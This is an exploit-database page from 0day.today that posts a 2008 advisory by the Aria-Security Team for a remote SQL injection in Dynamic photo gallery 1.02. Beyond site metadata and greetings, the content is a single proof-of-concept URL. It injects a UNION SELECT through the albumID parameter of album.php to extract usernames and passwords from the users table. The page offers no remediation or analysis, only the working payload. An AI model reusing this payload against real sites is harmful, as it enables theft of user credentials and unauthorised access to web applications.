[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Dynamic photo gallery 1.02 (albumID) Remote SQL Injection Vulnerability

Author
Aria-Security Team
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2713
Category
web applications
Date add
01-03-2008
Platform
unsorted
=======================================================================
Dynamic photo gallery 1.02 (albumID) Remote SQL Injection Vulnerability
=======================================================================




Aria-Security Team

----------------------------
Shoutz: Aura, imm02rtal, NULL, Kinglet And all our staff
Vendor: http://www.phpwebscript.net/dynamicphotogallery/foto-gallery.php

PoC:
album.php?slideshow=start&albumID=-4214/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/users


Regards
The-0utl4w 




#  0day.today [2024-12-24]  #